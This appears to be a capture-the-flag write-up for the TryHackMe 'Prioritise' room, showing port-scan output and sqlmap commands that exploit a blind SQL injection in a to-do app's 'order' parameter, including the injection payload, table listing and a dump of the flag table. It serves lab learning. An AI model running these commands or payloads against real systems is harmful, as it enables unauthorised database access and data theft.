Prioritise TryHackMe Writeup using SQLMap

CTF Writeup / Walkthrough for Prioritise using SQLMap

Initial Recon

We will use rustscan for port discovery

rustscan -a TARGET_IP -- -A -sC

The following should be the expected output

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 bc7ecc46211d6323652a21383e418c70 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBpuQwTu6CWYZ0CLlQZOeiBk/OXIQa3YrSDsozH9fx64LoNab7VKpvL2sMkC6Hiya5xZlXKOOIb0gGRXbCNPAXYO2v1grjUq8D3xzrOkEwIyoaltEAu2X2z+OEz5LmLS9bRCTqSJuhGF5ciXsuMUs3p9DqDPqRJlePMDm+knO1dI7+mUB8iGkDEirN9iqP/VAfz44awpZG9ZKz1eLV96gaZQqDrGhl7ot7bkLroKfdUMQzOOYy91Ax/RR1Yr3YYCy43X1CiR9lJ/kZnG5bgXwmupCuW0PWBJ4bGkA/JqsxD75z3DCl8aiK0SAUoiUhsUDgTP5pM8Wyt7ANtLV8mPqU32KO//YO/mxjrJoT0erfAxGe1pw0Ry86mMTH+fqen4SjZUenydDgYYadVZvus4TdF90VmnETQ5ubGx0Lvry2PmL2LsgEZYVdYk3bTFNYs9JZMgHnpE1ejx0toupdL0e1P2Xa/Zlqjl3scOQ49F8wziyiqSPkX0nSFV2Cb0t0ud0=
|   256 ea203ed1c491e879ef2d339bf11caf10 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHGWPtvoLcSuiPd+wNAPJ0qq3EEUNg8064D1mn6y6gEShvcHKz+xLg6p3ZgfDZvtYOwtbZ5sn7StlwpFExuJiCE=
|   256 c998ec9871424589e1222a32c4d2c01d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXA8smlcww1+5QTpnojr12eGZDWr//L/ghypXrbf17Z
80/tcp open  rtsp    syn-ack
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
|_http-title: Prioritise
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2756
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <meta
|     name="viewport"
|     content="width=device-width, initial-scale=1, shrink-to-fit=no"
|     <link
|     rel="stylesheet"
|     href="../static/css/bootstrap.min.css"
|     crossorigin="anonymous"
|     <link
|     rel="stylesheet"
|     href="../static/css/font-awesome.min.css"
|     crossorigin="anonymous"
|     <link
|     rel="stylesheet"
|     href="../static/css/bootstrap-datepicker.min.css"
|     crossorigin="anonymous"
|     <title>Prioritise</title>
|     </head>
|     <body>
|     <!-- Navigation -->
|     <nav class="navbar navbar-expand-md navbar-dark bg-dark">
|     <div class="container">
|     class="navbar-brand" href="/"><span class="">Prioritise</span></a>
|     <button
|     class="na
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|     Content-Length: 0
|   RTSPRequest: 
|     RTSP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|_    Content-Length: 0

It looks like there is only a single http server runnning a ToDo application, nothing interesting for us.

Let's head over to the ToDo app!

Let's add few items to the list

As you can see, I tried XSS payload and sql injection payload, but there is no success.

Let's use the Sort Option in the application

This could be our valid exploitation point, a perfect GET request.

We can now use SQLMap to do the job.

Attack Phase

FIring up SQLMap

sqlmap -u http://TARGGET_IP/\?order\=date --risk 3 --level 3

We are using SQLMap because we want an automated solution to a Blind SQL Injection, which if you do it manually will take a lot of time

After sometime, running the sqlmap we find a valid payload

[22:19:06] [INFO] checking if the injection point on GET parameter 'order' is a false positive
GET parameter 'order' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 807 HTTP(s) requests:
---
Parameter: order (GET)
    Type: boolean-based blind
    Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
    Payload: order=date AND CASE WHEN 3835=3835 THEN 3835 ELSE JSON(CHAR(88,99,121,110)) END
---
[22:19:14] [INFO] the back-end DBMS is SQLite

Let's check for tables now, since we are using a blind sql injection, we can use threads to make the process faster

sqlmap -u http://TARGET_IP/\?order\=date --risk 3 --level 3 --tables --threads 10

[2 tables]
+-------+
| flag  |
| todos |
+-------+

Well now we can check for the flag using the following command

sqlmap -u http://TARGET/\?order\=date --risk 3 --level 3 -T flag --threads 10 --dump

We now have the flag!

[22:22:51] [INFO] retrieved: 38
[22:23:04] [INFO] retrieved: flag{65f2f8cfd53d59422f3_REDACTED}             
Database: <current>
Table: flag
[1 entry]
+----------------------------------------+
| flag                                   |
+----------------------------------------+
| flag{65f2f8cfd53d59422f3_REDACTED} |
+----------------------------------------+

Last updated 1 year ago

Was this helpful?